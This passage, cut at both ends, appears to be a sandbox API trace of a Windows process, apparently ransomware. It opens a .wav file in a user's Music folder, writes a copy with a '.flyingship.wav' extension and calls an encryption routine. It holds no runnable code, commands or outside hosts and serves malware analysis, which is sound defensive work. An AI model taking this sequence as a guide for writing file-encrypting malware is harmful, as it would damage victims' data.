lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\olqmc1.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.658] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.658] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.660] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol")) returned 0x10 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\olqmc1.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.664] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0187.664] TranslateMessage (lpMsg=0x87f36c) returned 0 [0187.664] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0187.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.664] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0187.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.665] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0187.665] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0187.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0187.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0187.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0187.666] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.666] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2675, lpOverlapped=0x0) returned 1 [0187.668] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2675) returned 0x900190 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2675) returned 0x902810 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2675) returned 0x900190 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.671] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2675) returned 0x900190 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2675) returned 0xbea018 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.672] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.673] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0187.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0187.673] RtlAllocateHeap 